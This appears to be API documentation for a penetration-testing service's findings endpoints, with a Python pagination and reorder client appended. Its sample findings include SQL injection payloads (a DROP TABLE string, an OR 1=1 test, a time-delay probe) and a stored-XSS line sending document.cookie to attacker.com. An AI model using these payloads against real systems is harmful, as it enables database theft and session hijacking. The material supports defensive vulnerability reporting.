Findings API - apviso
Findings
========

View and manage vulnerability findings

GET `/v1/scans/:scanId/findings`

### List findings for a pentest

Retrieve a paginated list of vulnerability findings discovered during a pentest. Findings can be filtered by severity level and user-assigned status. Results are ordered by severity (critical first) then by position.

#### Path Parameters

| Name | Type | Description |
|---|---|---|
| `scanId` (required) | `string` | Pentest ID (UUIDv7) |

#### Query Parameters

| Name | Type | Description |
|---|---|---|
| `page` | `number` | Page number for pagination. Default: `1` |
| `limit` | `number` | Number of results per page (max 100). Default: `20` |
| `severity` | `string` | Filter by severity level. One of `critical`, `high`, `medium`, `low`, `info` |
| `userStatus` | `string` | Filter by user-assigned status. One of `open`, `in_progress`, `fixed`, `accepted_risk`, `false_positive` |

#### Example Request

```bash
curl -X GET "https://apviso.com/api/v1/scans/:scanId/findings" \
  -H "X-API-Key: apvk_your_key_here"
```

#### Response

Returns a paginated list of findings with full vulnerability details including CVSS scoring, CWE classification, evidence, reproduction steps, and remediation guidance.

```json
{
  "findings": [
    {
      "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "SQL Injection in /api/users endpoint",
      "severity": "critical",
      "cvssScore": 9.8,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "cweId": "CWE-89",
      "description": "The /api/users endpoint is vulnerable to SQL injection through the `sort` query parameter. An unauthenticated attacker can extract the full database contents, modify data, or execute operating system commands.",
      "evidence": "GET /api/users?sort=name%27%3B+DROP+TABLE+users%3B-- returned a 500 error with SQL error details in the response body.",
      "reproduction": [
        "Send a GET request to /api/users?sort=name' OR 1=1--",
        "Observe the response returns all user records regardless of authorization",
        "Confirm with time-based payload: /api/users?sort=name'; WAITFOR DELAY '0:0:5'--"
      ],
      "remediation": "Use parameterized queries or an ORM for all database operations. Validate and sanitize the `sort` parameter against an allowlist of column names.",
      "affectedUrl": "https://example.com/api/users",
      "agent": "pentester",
      "userStatus": "open",
      "position": 1,
      "createdAt": "2026-04-10T10:45:18Z",
      "updatedAt": "2026-04-10T10:45:18Z"
    },
    {
      "id": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "scanId": "019414c3-d5e6-7f8a-b9c0-1d2e3f4a5b6c",
      "title": "Cross-Site Scripting (Stored XSS) in user profile",
      "severity": "high",
      "cvssScore": 8.1,
      "cvssVector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "cweId": "CWE-79",
      "description": "The user profile bio field does not sanitize HTML input. Stored XSS payloads execute in the context of any user viewing the profile, enabling session hijacking and account takeover.",
      "evidence": "Setting the bio field to fetch(\"https://attacker.com/steal?c=\"+document.cookie) results in script execution when the profile is viewed.",
      "reproduction": [
        "Navigate to /settings/profile",
        "Enter  in the bio field",
        "Save the profile and view it in another browser session",
        "Observe the JavaScript alert fires with the domain"
      ],
      "remediation": "Sanitize all user-generated HTML content using a library like DOMPurify. Implement Content-Security-Policy headers to mitigate impact.",
      "affectedUrl": "https://example.com/settings/profile",
      "agent": "pentester",
      "userStatus": "open",
      "position": 2,
      "createdAt": "2026-04-10T10:48:33Z",
      "updatedAt": "2026-04-10T10:48:33Z"
    }
  ],
  "total": 21,
  "page": 1,
  "limit": 20,
  "totalPages": 2
}
```

PATCH `/v1/scans/:scanId/findings/:findingId/status`

### Update finding status

Update the user-assigned status of a finding. Use this to track your remediation progress. Status changes are reflected in compliance posture calculations and report generation.

#### Path Parameters

| Name | Type | Description |
|---|---|---|
| `scanId` (required) | `string` | Pentest ID (UUIDv7) |
| `findingId` (required) | `string` | Finding ID (UUIDv7) |

#### Request Body

| Name | Type | Description |
|---|---|---|
| `userStatus` (required) | `string` | New status for the finding. One of `open`, `in_progress`, `fixed`, `accepted_risk`, `false_positive` |

#### Example Request

```bash
curl -X PATCH "https://apviso.com/api/v1/scans/:scanId/findings/:findingId/status" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "userStatus": "in_progress"
}'
```

#### Response

Returns the updated finding.

```json
{
  "finding": {
    "id": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
    "userStatus": "in_progress",
    "updatedAt": "2026-05-03T15:22:08Z"
  }
}
```

PATCH `/v1/scans/:scanId/findings/reorder`

### Reorder findings

Update the display order of findings within a pentest. Use this to customize the priority ordering in your reports and dashboard views. Positions are zero-indexed integers.

#### Path Parameters

| Name | Type | Description |
|---|---|---|
| `scanId` (required) | `string` | Pentest ID (UUIDv7) |

#### Request Body

| Name | Type | Description |
|---|---|---|
| `positions` (required) | `array` | Array of objects with `findingId` (string) and `position` (number) specifying the new order |

#### Example Request

```bash
curl -X PATCH "https://apviso.com/api/v1/scans/:scanId/findings/reorder" \
  -H "X-API-Key: apvk_your_key_here" \
  -H "Content-Type: application/json" \
  -d '{
  "positions": [
    {
      "findingId": "019414c8-a1b2-7c3d-e4f5-6a7b8c9d0e1f",
      "position": 0
    },
    {
      "findingId": "019414c9-b2c3-7d4e-f5a6-7b8c9d0e1f2a",
      "position": 1
    },
    {
      "findingId": "019414ca-c3d4-7e5f-a6b7-8c9d0e1f2a3b",
      "position": 2
    }
  ]
}'
```

#### Response

Returns `"success": true` after applying the new finding positions.

```json
{
  "success": true
}
```
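A small client, added here as an example and not apviso's own SDK, that walks every page of the list endpoint (honouring the `limit` cap of 100 and the `severity`/`userStatus` filters) and then builds a zero-indexed `positions` body ordered by CVSS score for the reorder endpoint. The base URL and header are taken from the curl examples above; the transport layering, the `reorder_by_cvss` policy and the `SAMPLE` data are this example's own assumptions, so it can run offline.

```python
import json
from urllib import parse, request
BASE_URL = "https://apviso.com/api"  # base of the page's curl examples

# A transport is callable(method, path, query, body) -> parsed JSON; the live one below
# sends X-API-Key as the page's curl examples do, the constructed one runs offline.
def urllib_transport(api_key):
    def send(method, path, query, body):
        url = BASE_URL + path + ("?" + parse.urlencode(query) if query else "")
        data = None if body is None else json.dumps(body).encode()
        headers = {"X-API-Key": api_key, "Content-Type": "application/json"}
        req = request.Request(url, data=data, method=method, headers=headers)
        with request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    return send

def iter_findings(send, scan_id, severity=None, user_status=None):
    """Walk every page of GET /v1/scans/:scanId/findings (limit max is 100)."""
    page = 1
    while True:
        query = {"page": page, "limit": 100}
        query.update({k: v for k, v in (("severity", severity), ("userStatus", user_status)) if v})
        resp = send("GET", f"/v1/scans/{scan_id}/findings", query, None)
        yield from resp["findings"]
        if page >= resp["totalPages"]:
            return
        page += 1

def reorder_by_cvss(send, scan_id):
    """Build the zero-indexed positions body (highest cvssScore first) and PATCH it."""
    ordered = sorted(iter_findings(send, scan_id), key=lambda f: (-f["cvssScore"], f["position"]))
    ids = [f["id"] for f in ordered]
    if len(set(ids)) != len(ids):  # listing shifted between page fetches; do not send it
        raise ValueError("duplicate findingId across pages")
    body = {"positions": [{"findingId": fid, "position": i} for i, fid in enumerate(ids)]}
    send("PATCH", f"/v1/scans/{scan_id}/findings/reorder", {}, body)
    return body

# Constructed sample (not real apviso data): three findings served as two pages.
SAMPLE = [{"id": "f-a", "cvssScore": 8.1, "position": 1},
          {"id": "f-b", "cvssScore": 9.8, "position": 2},
          {"id": "f-c", "cvssScore": 9.8, "position": 3}]

def sample_transport(calls):  # offline stand-in; records every request in `calls`
    def send(method, path, query, body):
        calls.append((method, path, dict(query), body))
        if method == "GET":
            return {"findings": [SAMPLE[:2], SAMPLE[2:]][query["page"] - 1], "totalPages": 2}
        return {"success": True}
    return send
```

Swap `sample_transport(calls)` for `urllib_transport("apvk_your_key_here")` to run against the live API with the same code.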
